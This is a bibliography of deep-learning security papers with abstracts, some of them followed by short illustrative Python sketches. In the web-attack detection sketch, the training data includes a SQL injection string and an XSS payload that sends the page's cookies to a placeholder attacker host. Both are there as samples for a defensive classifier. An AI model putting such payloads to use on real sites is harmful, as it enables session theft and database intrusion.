Biblio

Found 631 results

Filters: Keyword is Deep Learning
2023-02-13
Wu, Yueming, Zou, Deqing, Dou, Shihan, Yang, Wei, Xu, Duo, Jin, Hai.  2022.  VulCNN: An Image-inspired Scalable Vulnerability Detection System. 2022 IEEE/ACM 44th International Conference on Software Engineering (ICSE). :2365–2376.
Since deep learning (DL) can automatically learn features from source code, it has been widely used to detect source code vulnerabilities. To achieve scalable vulnerability scanning, some prior studies process the source code directly by treating it as text. To achieve accurate vulnerability detection, other approaches distill the program semantics into graph representations and use them to detect vulnerabilities. In practice, text-based techniques are scalable but not accurate due to the lack of program semantics. Graph-based methods are accurate but not scalable since graph analysis is typically time-consuming. In this paper, we aim to achieve both scalability and accuracy when scanning large-scale source code for vulnerabilities. Inspired by existing DL-based image classification, which can analyze millions of images accurately, we apply these techniques to our problem. Specifically, we propose a novel idea that can efficiently convert the source code of a function into an image while preserving the program details. We implement VulCNN and evaluate it on a dataset of 13,687 vulnerable functions and 26,970 non-vulnerable functions. Experimental results report that VulCNN achieves better accuracy than eight state-of-the-art vulnerability detectors (i.e., Checkmarx, FlawFinder, RATS, TokenCNN, VulDeePecker, SySeVR, VulDeeLocator, and Devign). As for scalability, VulCNN is about four times faster than VulDeePecker and SySeVR, about 15 times faster than VulDeeLocator, and about six times faster than Devign. Furthermore, we conduct a case study on more than 25 million lines of code, and the result indicates that VulCNN can detect vulnerabilities at scale. Through the scanning reports, we finally discover 73 vulnerabilities that are not reported in NVD.
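The core step, converting a function's source code into a fixed-size image, can be illustrated with a minimal Python sketch. This is a hypothetical byte-level encoding written for this summary; VulCNN itself builds image channels from semantics-aware line embeddings weighted by graph centrality, which this toy omits entirely.

import numpy as np

def code_to_image(source: str, height: int = 64, width: int = 64) -> np.ndarray:
    # Toy encoding: one source line per image row, one character per pixel.
    img = np.zeros((height, width), dtype=np.uint8)
    for r, line in enumerate(source.splitlines()[:height]):
        for c, ch in enumerate(line[:width]):
            img[r, c] = ord(ch) % 256  # character byte as pixel intensity
    return img

snippet = "int f(char *s) {\n  char buf[8];\n  strcpy(buf, s); /* overflow */\n  return 0;\n}"
image = code_to_image(snippet)
print(image.shape)  # (64, 64): ready for a standard CNN classifier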
2023-02-03
Kumar, Abhinav, Tourani, Reza, Vij, Mona, Srikanteswara, Srikathyayani.  2022.  SCLERA: A Framework for Privacy-Preserving MLaaS at the Pervasive Edge. 2022 IEEE International Conference on Pervasive Computing and Communications Workshops and other Affiliated Events (PerCom Workshops). :175–180.
The increasing data generation rate and the proliferation of deep learning applications have led to the development of machine learning-as-a-service (MLaaS) platforms by major Cloud providers. The existing MLaaS platforms, however, fall short in protecting the clients' private data. Recent distributed MLaaS architectures such as federated learning have also been shown to be vulnerable to a range of privacy attacks. Such vulnerabilities motivated the development of privacy-preserving MLaaS techniques, which often use complex cryptographic primitives. Such approaches, however, demand abundant computing resources, which undermines the low-latency nature of evolving applications such as autonomous driving. To address these challenges, we propose SCLERA, an efficient MLaaS framework that utilizes a trusted execution environment for secure execution of clients' workloads. SCLERA features a set of optimization techniques to reduce the computational complexity of the offloaded services and achieve low-latency inference. We assessed SCLERA's efficacy using image/video analytic use cases such as scene detection. Our results show that SCLERA achieves up to 23× speed-up when compared to the baseline secure model execution.
Oldal, Laura Gulyás, Kertész, Gábor.  2022.  Evaluation of Deep Learning-based Authorship Attribution Methods on Hungarian Texts. 2022 IEEE 10th Jubilee International Conference on Computational Cybernetics and Cyber-Medical Systems (ICCC). :000161–000166.
The range of text analysis methods in the field of natural language processing (NLP) has become more and more extensive thanks to the increasing computational resources of the 21st century. As a result, many deep learning-based solutions have been proposed for the purpose of authorship attribution, as they offer more flexibility and automated feature extraction compared to traditional statistical methods. A number of solutions have appeared for the attribution of English texts; however, the number of methods designed for the Hungarian language is extremely small. Hungarian is a morphologically rich language, its sentence formation is flexible, and its alphabet differs from that of other languages. Furthermore, a language-specific POS tagger, pretrained word embeddings, dependency parser, etc. are required. As a result, methods designed for other languages cannot be directly applied to Hungarian texts. In this paper, we review deep learning-based authorship attribution methods for English texts and offer techniques for adapting these solutions to the Hungarian language. As part of the paper, we collected a new dataset consisting of Hungarian literary works of 15 authors. In addition, we extensively evaluate the implemented methods on the new dataset.
Liu, Qin, Yang, Jiamin, Jiang, Hongbo, Wu, Jie, Peng, Tao, Wang, Tian, Wang, Guojun.  2022.  When Deep Learning Meets Steganography: Protecting Inference Privacy in the Dark. IEEE INFOCOM 2022 - IEEE Conference on Computer Communications. :590–599.
While cloud-based deep learning enables high-accuracy inference, it leads to potential privacy risks when exposing sensitive data to untrusted servers. In this paper, we explore the feasibility of steganography in preserving inference privacy. Specifically, we devise GHOST and GHOST+, two private inference solutions employing steganography to make sensitive images invisible in the inference phase. Motivated by the fact that deep neural networks (DNNs) are inherently vulnerable to adversarial attacks, our main idea is turning this vulnerability into a weapon for data privacy, enabling the DNN to misclassify a stego image into the class of the sensitive image hidden in it. The main difference is that GHOST retrains the DNN into a poisoned network to learn the hidden features of sensitive images, while GHOST+ leverages a generative adversarial network (GAN) to produce adversarial perturbations without altering the DNN. For enhanced privacy and a better computation-communication trade-off, both solutions adopt the edge-cloud collaborative framework. Compared with previous solutions, this is the first work that successfully integrates steganography and the nature of DNNs to achieve private inference while ensuring high accuracy. Extensive experiments validate that steganography has excellent ability in accuracy-aware privacy protection of deep learning.
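For readers unfamiliar with the hiding step, a generic least-significant-bit (LSB) embedding is sketched below. This is illustration only, with made-up array shapes; GHOST and GHOST+ pair the hidden image with a poisoned classifier or GAN-crafted perturbations rather than relying on the plain LSB scheme shown here.

import numpy as np

def lsb_embed(cover, secret, bits=2):
    # Keep the high bits of the cover; hide the top bits of the secret in its low bits.
    cover_hi = cover & (256 - (1 << bits))
    secret_hi = secret >> (8 - bits)
    return (cover_hi | secret_hi).astype(np.uint8)

def lsb_extract(stego, bits=2):
    # Recover an approximation of the secret from the low bits.
    return ((stego & ((1 << bits) - 1)) << (8 - bits)).astype(np.uint8)

rng = np.random.default_rng(0)
cover = rng.integers(0, 256, (32, 32, 3), dtype=np.uint8)
secret = rng.integers(0, 256, (32, 32, 3), dtype=np.uint8)
stego = lsb_embed(cover, secret)
print(np.abs(stego.astype(int) - cover.astype(int)).max())  # at most 3: visually negligible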
ISSN: 2641-9874
Hussainy, Abdelrahman S., Khalifa, Mahmoud A., Elsayed, Abdallah, Hussien, Amr, Razek, Mohammed Abdel.  2022.  Deep Learning Toward Preventing Web Attacks. 2022 5th International Conference on Computing and Informatics (ICCI). :280–285.
Cyberattacks are one of the most pressing issues of our time. Cyberthreats can damage various sectors such as business, health care, and government, so one of the best ways to deal with these cyberattacks and reduce cybersecurity threats is using deep learning. In this paper, we have created a deep learning model to detect SQL Injection attacks and Cross-Site Scripting (XSS) attacks. Within XSS, we focused on the Stored-XSS attack type because SQL injection and Stored-XSS involve similar site management methods. The advantage of combining deep learning with cybersecurity in our system is the ability to detect and prevent short-term attacks without human interaction, so our system can reduce and prevent web attacks. After training, the model achieved an accuracy of more than 99%, and for 99% of our test data it correctly determines whether an input is normal or malicious.
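As a toy illustration of this classification setup, the sketch below trains a small scikit-learn model on character n-grams of payload strings. The four payloads, the labels, and the model sizes are our own stand-ins; the paper's actual deep architecture and training data are not reproduced here.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import make_pipeline

# Tiny illustrative dataset; real training needs thousands of labeled payloads.
payloads = [
    "SELECT name FROM users WHERE id = 42",
    "' OR '1'='1' --",
    "<script>document.location='http://evil/'+document.cookie</script>",
    "Hello, this is a normal comment.",
]
labels = [0, 1, 1, 0]  # 0 = benign, 1 = attack

model = make_pipeline(
    TfidfVectorizer(analyzer="char", ngram_range=(1, 3)),  # char n-grams catch tokens like ' OR
    MLPClassifier(hidden_layer_sizes=(32,), max_iter=500, random_state=0),
)
model.fit(payloads, labels)
print(model.predict(["admin' OR 1=1 --", "What a nice day"]))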
Muliono, Yohan, Darus, Mohamad Yusof, Pardomuan, Chrisando Ryan, Ariffin, Muhammad Azizi Mohd, Kurniawan, Aditya.  2022.  Predicting Confidentiality, Integrity, and Availability from SQL Injection Payload. 2022 International Conference on Information Management and Technology (ICIMTech). :600–605.
SQL Injection has been around as a harmful and prolific threat to web applications for more than 20 years, yet it still poses a huge threat to the World Wide Web. Rapidly evolving web technology has not eradicated this threat; in 2017, 51% of web application attacks were SQL injection attacks. Most conventional practices to prevent SQL injection attacks revolve around secure web and database programming and administration techniques. Owing in part to developer ignorance, a large number of online applications remain susceptible to SQL injection attacks. There is a need for a more effective method to detect and prevent SQL injection attacks. In this research, we offer a unique machine learning-based strategy for identifying potential SQL injection attack threats. Application of the proposed method in a Security Information and Event Management (SIEM) system is discussed. SIEM can aggregate and normalize event information from multiple sources and detect malicious events from analysis of this information. The result of this work shows that a machine learning-based SQL injection attack detector using the SIEM approach possesses high accuracy in detecting malicious SQL queries.
2023-01-20
Mohammadpourfard, Mostafa, Weng, Yang, Genc, Istemihan, Kim, Taesic.  2022.  An Accurate False Data Injection Attack (FDIA) Detection in Renewable-Rich Power Grids. 2022 10th Workshop on Modelling and Simulation of Cyber-Physical Energy Systems (MSCPES). :1–5.
Accurate state estimation (SE) that accounts for the increased uncertainty introduced by the high penetration of renewable energy systems (RESs) is increasingly important for enhancing situational awareness and the optimal, resilient operation of renewable-rich power grids. However, it is anticipated that adversaries who plan to manipulate the target power grid will generate attacks that inject inaccurate data into the SE using the vulnerabilities of the devices and networks. Among potential attack types, the false data injection attack (FDIA) is gaining popularity since it can bypass bad data detection (BDD) methods implemented in SE systems. Although numerous FDIA detection methods have been proposed recently, the uncertainty of system configuration that arises from the continuously increasing penetration of RESs has been given less consideration in FDIA algorithms. To address this issue, this paper proposes a new FDIA detection scheme that is applicable to renewable energy-rich power grids. A deep learning framework is developed in particular by synergistically constructing a Bidirectional Long Short-Term Memory (Bi-LSTM) network with modern smart grid characteristics. The developed framework is evaluated on the IEEE 14-bus system integrating several RESs by using several attack scenarios. A comparison of the numerical results shows that the proposed FDIA detection mechanism outperforms the existing deep learning-based approaches in a renewable energy-rich grid environment.
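A minimal PyTorch sketch of such a detector follows. The window length and measurement count are invented here (the paper trains on IEEE 14-bus data with its own feature set), so treat this only as the architectural shape of a Bi-LSTM classifier.

import torch
import torch.nn as nn

class BiLSTMDetector(nn.Module):
    # Flags a window of state-estimation measurements as normal (0) or falsified (1).
    def __init__(self, n_meas=19, hidden=64):
        super().__init__()
        self.lstm = nn.LSTM(n_meas, hidden, batch_first=True, bidirectional=True)
        self.head = nn.Linear(2 * hidden, 2)

    def forward(self, x):                # x: (batch, time, n_meas)
        out, _ = self.lstm(x)
        return self.head(out[:, -1, :])  # classify from the last time step

window = torch.randn(8, 30, 19)          # 8 windows, 30 steps, 19 measurements
print(BiLSTMDetector()(window).shape)    # torch.Size([8, 2])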
Korkmaz, Yusuf, Huseinovic, Alvin, Bisgin, Halil, Mrdović, Saša, Uludag, Suleyman.  2022.  Using Deep Learning for Detecting Mirroring Attacks on Smart Grid PMU Networks. 2022 International Balkan Conference on Communications and Networking (BalkanCom). :84–89.
Like any monitoring systems, power grid monitoring systems and devices are subject to various cyberattacks by determined and well-funded adversaries. Many real-world cyberattacks on power grid systems have been publicly reported. Phasor Measurement Unit (PMU) networks with Phasor Data Concentrators (PDCs) are the main building blocks of the overall wide area monitoring and situational awareness systems in the power grid. The data between PMUs and PDC(s) are sent through legacy networks, which are subject to many attack scenarios with no, or inadequate, countermeasures in protocols such as IEEE C37.118.2. In this paper, we consider a stealthier data spoofing attack against PMU networks, called a mirroring attack, where an adversary injects a copy of a set of packets in reverse order immediately following their original positions, wiping out the correct values. To the best of our knowledge, for the first time in the literature, we consider a more challenging attack both in terms of the strategy and the lower percentage of spoofed data. As part of our countermeasure detection scheme, we make use of a novel framing approach to apply a 2D Convolutional Neural Network (CNN)-based classifier, which avoids the computational overhead of classical sample-based classification algorithms. Our experimental evaluation shows promising results in terms of both high accuracy and true positive rates even under the aforementioned stealthy adversarial attack scenarios.
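The mirroring manipulation itself is easy to picture at the list level. The sketch below is our own abstraction over a list of frames; the real attack rewrites PMU traffic in transit.

def mirror_attack(packets, start, length):
    # Inject a reversed copy of packets[start:start+length] right after the
    # window, overwriting the `length` frames that should have followed it.
    window = packets[start:start + length]
    return packets[:start + length] + list(reversed(window)) + packets[start + 2 * length:]

stream = list(range(10))                       # stand-in for PMU measurement frames
print(mirror_attack(stream, start=2, length=3))
# [0, 1, 2, 3, 4, 4, 3, 2, 8, 9] -- frames 5..7 are wiped out by the mirrored copy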
2023-01-13
Kapoor, Mehul, Kaur, Puneet Jai.  2022.  Hybridization of Deep Learning & Machine Learning For IoT Based Intrusion Classification. 2022 International Conference on Breakthrough in Heuristics And Reciprocation of Advanced Technologies (BHARAT). :138–143.
With the rise of IoT applications, about 20.4 billion devices were expected to be online in 2020, and that number is projected to rise to 75 billion by 2025. Different sensors in IoT devices let them acquire and process data remotely and in real time. Sensors give them information that helps them make smart decisions and manage IoT environments well. IoT security is one of the most important things to consider when developing, implementing, and deploying IoT platforms. People who use the Internet of Things (IoT) say that it allows them to communicate with, monitor, and control automated devices from afar. This paper shows how to use deep learning and machine learning to build an IDS that can be used on IoT platforms as a service. In the proposed method, a CNN maps the features and a random forest classifies normal and attack classes, as in the sketch below. In the end, the proposed method improved all performance parameters, with average performance metrics rising by 5% to 6%.
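A minimal sketch of such a hybrid, with invented shapes (41 raw features per flow, random labels) and an untrained CNN standing in for the paper's trained feature mapper:

import numpy as np
import torch
import torch.nn as nn
from sklearn.ensemble import RandomForestClassifier

cnn = nn.Sequential(                        # toy 1D CNN used only as a feature mapper
    nn.Conv1d(1, 16, kernel_size=3, padding=1), nn.ReLU(),
    nn.AdaptiveAvgPool1d(8), nn.Flatten(),  # -> 16 * 8 = 128 features per flow
)

X = torch.randn(200, 1, 41)                 # 200 flows, 41 raw features each
y = np.random.randint(0, 2, 200)            # 0 = normal, 1 = attack (random stand-ins)

with torch.no_grad():
    feats = cnn(X).numpy()                  # CNN maps raw features to a learned space

rf = RandomForestClassifier(n_estimators=100, random_state=0).fit(feats, y)
print(rf.score(feats, y))                   # training accuracy of the RF stage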
Krishna, P. Vamsi, Matta, Venkata Durga Rao.  2022.  A Unique Deep Intrusion Detection Approach (UDIDA) for Detecting the Complex Attacks. 2022 International Conference on Edge Computing and Applications (ICECAA). :557–560.
An Intrusion Detection System (IDS) is one of the applications used to detect intrusions in a network. An IDS aims to detect malicious activities and protects computer networks from unknown persons or users, called attackers. Network security is one of the significant tasks that should provide secure data transfer. Virtualization of networks becomes more complex with IoT technology. Deep Learning (DL) is widely used in many networks to detect complex patterns and is a very suitable approach for detecting malicious nodes or attacks. Software-Defined Networking (SDN) is the default approach to virtualizing computer networks. Attackers keep developing new techniques to attack networks, so new protocols are required to prevent these attacks. In this paper, a unique deep intrusion detection approach (UDIDA) is developed to detect attacks in SDN. Performance results show that the proposed approach achieves higher accuracy than existing approaches.
2023-01-06
Chen, Tianlong, Zhang, Zhenyu, Zhang, Yihua, Chang, Shiyu, Liu, Sijia, Wang, Zhangyang.  2022.  Quarantine: Sparsity Can Uncover the Trojan Attack Trigger for Free. 2022 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR). :588–599.
Trojan attacks threaten deep neural networks (DNNs) by poisoning them to behave normally on most samples, yet produce manipulated results for inputs attached with a particular trigger. Several works attempt to detect whether a given DNN has been injected with a specific trigger during training. In a parallel line of research, the lottery ticket hypothesis reveals the existence of sparse sub-networks which are capable of reaching performance competitive with the dense network after independent training. Connecting these two dots, we investigate the problem of Trojan DNN detection through the new lens of sparsity, even when no clean training data is available. Our crucial observation is that the Trojan features are significantly more stable to network pruning than benign features. Leveraging that, we propose a novel Trojan network detection regime: first locating a “winning Trojan lottery ticket” which preserves nearly full Trojan information yet only chance-level performance on clean inputs; then recovering the trigger embedded in this already isolated sub-network. Extensive experiments on various datasets, i.e., CIFAR-10, CIFAR-100, and ImageNet, with different network architectures, i.e., VGG-16, ResNet-18, ResNet-20s, and DenseNet-100, demonstrate the effectiveness of our proposal. Codes are available at https://github.com/VITA-Group/Backdoor-LTH.
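The stability observation can be probed with plain magnitude pruning: prune ever harder and watch clean accuracy collapse while trigger behavior persists. A minimal mask-construction sketch follows (the Trojaned model and the evaluation loops are omitted; the paper's actual procedure is more involved).

import torch
import torch.nn as nn

def magnitude_prune(model, sparsity):
    # Zero out the smallest-magnitude fraction of every weight tensor.
    for m in model.modules():
        if isinstance(m, (nn.Linear, nn.Conv2d)):
            w = m.weight.data
            k = int(sparsity * w.numel())
            if k == 0:
                continue
            threshold = w.abs().flatten().kthvalue(k).values
            w.mul_((w.abs() > threshold).float())  # keep only the large weights

net = nn.Sequential(nn.Linear(32, 64), nn.ReLU(), nn.Linear(64, 10))
magnitude_prune(net, sparsity=0.9)
zeros = sum((p == 0).sum().item() for p in net.parameters() if p.dim() > 1)
total = sum(p.numel() for p in net.parameters() if p.dim() > 1)
print(f"{zeros}/{total} weights pruned")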
Sharma, Himanshu, Kumar, Neeraj, Tekchandani, Raj Kumar, Mohammad, Nazeeruddin.  2022.  Deep Learning enabled Channel Secrecy Codes for Physical Layer Security of UAVs in 5G and beyond Networks. ICC 2022 - IEEE International Conference on Communications. :1–6.
Unmanned Aerial Vehicles (UAVs) are drawing enormous attention in both commercial and military applications to facilitate dynamic wireless communications and deliver seamless connectivity due to their flexible deployment, inherent line-of-sight (LOS) air-to-ground (A2G) channels, and high mobility. These advantages, however, render UAV-enabled wireless communication systems susceptible to eavesdropping attempts. Hence, there is a strong need to protect the wireless channel through which most of the UAV-enabled applications share data with each other. There exist various error-correction techniques, such as Low-Density Parity-Check (LDPC) and polar codes, that provide safe and reliable data transmission by exploiting the physical layer, but they require high transmission power. Also, the security gap achieved by these error-correction techniques must be reduced to improve the security level. In this paper, we present deep learning (DL) enabled punctured LDPC codes to provide secure and reliable transmission of data for UAVs through the Additive White Gaussian Noise (AWGN) channel irrespective of the computational power and channel state information (CSI) of the eavesdropper. Numerical results show that the proposed scheme reduces the Bit Error Rate (BER) at Bob effectively as compared to Eve, and a Signal-to-Noise Ratio (SNR) per bit value of 3.5 dB is achieved at the maximum threshold value of BER. Also, the security gap is reduced by 47.22% as compared to conventional LDPC codes.
2023-01-05
C, Chethana, Pareek, Piyush Kumar, Costa de Albuquerque, Victor Hugo, Khanna, Ashish, Gupta, Deepak.  2022.  Deep Learning Technique Based Intrusion Detection in Cyber-Security Networks. 2022 IEEE 2nd Mysore Sub Section International Conference (MysuruCon). :1–7.
As a result of the inherent weaknesses of the wireless medium, ad hoc networks are susceptible to a broad variety of threats and assaults. As a direct consequence, intrusion detection, as well as security, privacy, and authentication in ad-hoc networks, has developed into a primary focus of current study. This body of research aims to identify the dangers posed by a variety of assaults that are often seen in wireless ad-hoc networks and provide strategies to counteract those dangers. The black hole attack, wormhole attack, selective forwarding attack, Sybil attack, and denial-of-service attack are the specific topics covered in this thesis. In this paper, we describe a trust-based safe routing protocol with the goal of mitigating the interference of black hole nodes in the course of routing in mobile ad-hoc networks. The overall performance of the network is negatively impacted when there are black hole nodes on the route that packets take. As a result, we have developed a routing protocol that reduces the likelihood that packets will be lost to black hole nodes. This routing system has been subjected to experimental testing in order to guarantee that the most secure path will be selected for the delivery of packets between a source and a destination. The invasion of wormholes into a wireless network results in the segmentation of the network as well as disorder in the routing. As a result, we provide an effective approach for locating wormholes by using ordinal multi-dimensional scaling and round-trip duration in wireless ad hoc networks with either sparse or dense topologies. Wormholes that are linked by both short-path and long-path wormhole links may be found using the given approach. This method is subjected to experimental testing in order to guarantee that the ad hoc network does not include any wormholes that go unnoticed. In order to fight against selective forwarding attacks in wireless ad-hoc networks, we have developed three different techniques. The first method is an incentive-based algorithm that makes use of a reward-punishment system to drive cooperation among nodes for the purpose of forwarding messages in crowded ad-hoc networks. A unique adversarial model has been developed in which three distinct types of nodes and the activities they participate in are specified. We have shown that the suggested incentive-based strategy prohibits nodes from adopting individualistic behaviour, which ensures collaboration in the process of packet forwarding. To guarantee that intermediate nodes in resource-constrained ad-hoc networks accurately convey packets, the second approach proposes a model based on non-cooperative game theory. This game reaches a desired equilibrium state, which assures that cooperation in multi-hop communication is feasible. In the third algorithm, we present a detection approach that locates malicious nodes in multi-hop hierarchical ad-hoc networks by employing binary search and control packets. We have shown that the cluster head is capable of accurately identifying the malicious node by analysing the sequences of packets that are dropped along the path leading from a source node to the cluster head. A lightweight symmetric encryption technique that uses Binary Playfair is presented as a means of safeguarding the transport of data. We demonstrate via experimentation that the suggested encryption method is efficient with regard to the amount of energy used, the amount of time required for encryption, and the memory overhead. This lightweight encryption technique is used in clustered wireless ad-hoc networks to reduce the likelihood of a Sybil attack occurring in such networks.
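The binary-search idea behind the third algorithm can be modeled in a few lines. Here probe() is a hypothetical stand-in for sending a control packet and waiting for the k-th node's acknowledgment; the protocol's packet formats and cluster-head bookkeeping are not shown.

def find_dropper(path, probe):
    # Nodes before the dropper acknowledge control packets; the dropper and
    # everything behind it stay silent, so binary search finds the first
    # failing index in O(log n) probes.
    lo, hi = 0, len(path) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(mid):        # ack received: dropper is further along the path
            lo = mid + 1
        else:                 # no ack: dropper is here or earlier
            hi = mid
    return path[lo]

path = ["n1", "n2", "n3", "n4", "n5", "n6"]
malicious = 3                 # pretend n4 silently drops packets
print(find_dropper(path, probe=lambda k: k < malicious))  # -> n4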
2022-12-23
Huo, Da, Li, Xiaoyong, Li, Linghui, Gao, Yali, Li, Ximing, Yuan, Jie.  2022.  The Application of 1D-CNN in Microsoft Malware Detection. 2022 7th International Conference on Big Data Analytics (ICBDA). :181–187.
In the computer field, cybersecurity has always been a focus of attention. How to detect malware effectively is one of the focuses and difficulties in network security research. Traditional malware detection schemes can be mainly divided into two categories: database matching and machine learning methods. With the rise of deep learning, more and more deep learning methods are applied in the field of malware detection, since deeper semantic features can be extracted via deep neural networks. The main tasks of this paper are as follows: (1) using machine learning methods and one-dimensional convolutional neural networks to detect malware; (2) proposing a method that combines machine learning and deep learning for detection. In (1), machine learning with LGBM obtains an accuracy of 67.16%, and the one-dimensional CNN obtains an accuracy of 72.47%. In (2), LGBM is used to screen features by importance before a one-dimensional convolutional neural network is applied, which further improves the detection result to an accuracy of 78.64%.
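The screening step can be sketched with LightGBM's built-in feature importances. Everything below is a stand-in (synthetic data, 256 features, a cutoff of 32); only the reduced matrix would then feed the 1D CNN described in the paper.

import numpy as np
import lightgbm as lgb

rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 256))              # stand-in static malware features
y = (X[:, 7] + X[:, 42] > 0).astype(int)      # labels driven by two features

booster = lgb.LGBMClassifier(n_estimators=50, random_state=0).fit(X, y)
top = np.argsort(booster.feature_importances_)[::-1][:32]
print(sorted(top[:2]))                        # features 7 and 42 should rank highest

X_screened = X[:, top]                        # reduced input for the 1D CNN stage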
2022-12-20
Rakin, Adnan Siraj, Chowdhuryy, Md Hafizul Islam, Yao, Fan, Fan, Deliang.  2022.  DeepSteal: Advanced Model Extractions Leveraging Efficient Weight Stealing in Memories. 2022 IEEE Symposium on Security and Privacy (SP). :1157–1174.
Recent advancements in Deep Neural Networks (DNNs) have enabled widespread deployment in multiple security-sensitive domains. The need for resource-intensive training and the use of valuable domain-specific training data have made these models the top intellectual property (IP) for model owners. One of the major threats to DNN privacy is model extraction attacks, where adversaries attempt to steal sensitive information in DNN models. In this work, we propose an advanced model extraction framework, DeepSteal, that for the first time steals DNN weights remotely with the aid of a memory side-channel attack. Our proposed DeepSteal comprises two key stages. Firstly, we develop a new weight bit information extraction method, called HammerLeak, by adopting the rowhammer-based fault technique as the information leakage vector. HammerLeak leverages several novel system-level techniques tailored for DNN applications to enable fast and efficient weight stealing. Secondly, we propose a novel substitute model training algorithm with a Mean Clustering weight penalty, which leverages the partially leaked bit information effectively and generates a substitute prototype of the target victim model. We evaluate the proposed model extraction framework on three popular image datasets (i.e., CIFAR-10, CIFAR-100, and GTSRB) and four DNN architectures (i.e., ResNet-18, ResNet-34, Wide-ResNet, and VGG-11). The extracted substitute model has successfully achieved more than 90% test accuracy on deep residual networks for the CIFAR-10 dataset. Moreover, our extracted substitute model can also generate effective adversarial input samples to fool the victim model. Notably, it achieves similar performance (i.e., 1-2% test accuracy under attack) to white-box adversarial input attacks (e.g., PGD/Trades).
ISSN: 2375-1207
Li, Fang-Qi, Wang, Shi-Lin, Zhu, Yun.  2022.  Fostering The Robustness Of White-Box Deep Neural Network Watermarks By Neuron Alignment. ICASSP 2022 - 2022 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). :3049–3053.
The wide application of deep learning techniques is boosting the regulation of deep learning models, especially deep neural networks (DNNs), as commercial products. A necessary prerequisite for such regulation is identifying the owner of deep neural networks, which is usually done through watermarking. Current DNN watermarking schemes, particularly white-box ones, are uniformly fragile against a family of functionality equivalence attacks, especially neuron permutation. This operation can effortlessly invalidate the ownership proof and escape copyright regulations. To enhance the robustness of white-box DNN watermarking schemes, this paper presents a procedure that aligns neurons into the same order as when the watermark was embedded, so the watermark can be correctly recognized. This neuron alignment process significantly facilitates the functionality of established deep neural network watermarking schemes.
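When the attack is a pure neuron permutation, alignment reduces to matching weight rows. The sketch below is a simplified stand-in using the Hungarian algorithm on a noise-free layer; the paper's procedure handles deeper networks and subtler equivalences.

import numpy as np
from scipy.optimize import linear_sum_assignment

def align_neurons(W_ref, W_perm):
    # Cost of matching reference neuron i to shuffled neuron j.
    cost = ((W_ref[:, None, :] - W_perm[None, :, :]) ** 2).sum(-1)
    _, col = linear_sum_assignment(cost)   # col[i] = shuffled index matching neuron i
    return col

rng = np.random.default_rng(0)
W = rng.normal(size=(8, 16))               # 8 neurons, 16 inputs each
shuffled = W[rng.permutation(8)]           # attacker permutes the neurons

order = align_neurons(W, shuffled)
print(np.array_equal(shuffled[order], W))  # True: layer restored to watermark order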
Liu, Xiaolei, Li, Xiaoyu, Zheng, Desheng, Bai, Jiayu, Peng, Yu, Zhang, Shibin.  2022.  Automatic Selection Attacks Framework for Hard Label Black-Box Models. IEEE INFOCOM 2022 - IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). :1–7.
Current adversarial attacks against machine learning models can be divided into white-box attacks and black-box attacks. Further, black-box attacks can be subdivided into soft-label and hard-label settings, but the latter has the deficiency of only returning the class with the highest prediction probability, which makes gradient estimation difficult. However, due to its wide application, exploring hard-label black-box attacks is of great research significance and application value. This paper proposes an Automatic Selection Attacks Framework (ASAF) for hard-label black-box models, which can be explained in two aspects based on the existing attack methods. Firstly, ASAF applies model equivalence to select substitute models automatically so as to generate adversarial examples and then completes black-box attacks based on their transferability. Secondly, a specified feature selection and parallel attack method is proposed to shorten the attack time and improve the attack success rate. The experimental results show that ASAF can achieve more than a 90% success rate for non-targeted attacks on the common models ResNet-101 (CIFAR-10) and InceptionV4 (ImageNet). Meanwhile, compared with FGSM and other attack algorithms, the attack time is reduced by at least 89.7% and 87.8% on the two traditional datasets, respectively. Besides, it can achieve a 90% attack success rate on the online model, BaiduAI digital recognition. In conclusion, ASAF is the first automatic selection attacks framework for hard-label black-box models, in which specified feature selection and parallel attack methods speed up automatic attacks.
Zhan, Yike, Zheng, Baolin, Wang, Qian, Mou, Ningping, Guo, Binqing, Li, Qi, Shen, Chao, Wang, Cong.  2022.  Towards Black-Box Adversarial Attacks on Interpretable Deep Learning Systems. 2022 IEEE International Conference on Multimedia and Expo (ICME). :1–6.
Recent works have empirically shown that neural network interpretability is susceptible to malicious manipulations. However, existing attacks against Interpretable Deep Learning Systems (IDLSes) all focus on the white-box setting, which is impractical in real-world scenarios. In this paper, we make the first attempt to attack IDLSes in the decision-based black-box setting. We propose a new framework called Dual Black-box Adversarial Attack (DBAA) which can generate adversarial examples that are misclassified as the target class, yet have very similar interpretations to their benign counterparts. We conduct comprehensive experiments on different combinations of classifiers and interpreters to illustrate the effectiveness of DBAA. Empirical results show that in all cases, DBAA achieves high attack success rates and Intersection over Union (IoU) scores.
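The IoU score here compares the salient regions of two interpretation maps. A minimal sketch of how such a score might be computed follows; the 90th-percentile binarization and the random maps are our own choices, not the paper's exact protocol.

import numpy as np

def interpretation_iou(map_a, map_b, quantile=0.9):
    # Binarize each saliency map at its own quantile, then compare regions.
    a = map_a >= np.quantile(map_a, quantile)
    b = map_b >= np.quantile(map_b, quantile)
    union = np.logical_or(a, b).sum()
    return np.logical_and(a, b).sum() / union if union else 1.0

rng = np.random.default_rng(0)
benign = rng.random((224, 224))                        # stand-in saliency map
adversarial = benign + 0.05 * rng.random((224, 224))   # mildly perturbed map
print(round(interpretation_iou(benign, adversarial), 3))  # high overlap for similar maps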
2022-12-09
Sagar, Maloth, C, Vanmathi.  2022.  Network Cluster Reliability with Enhanced Security and Privacy of IoT Data for Anomaly Detection Using a Deep Learning Model. 2022 Third International Conference on Intelligent Computing Instrumentation and Control Technologies (ICICICT). :1670–1677.
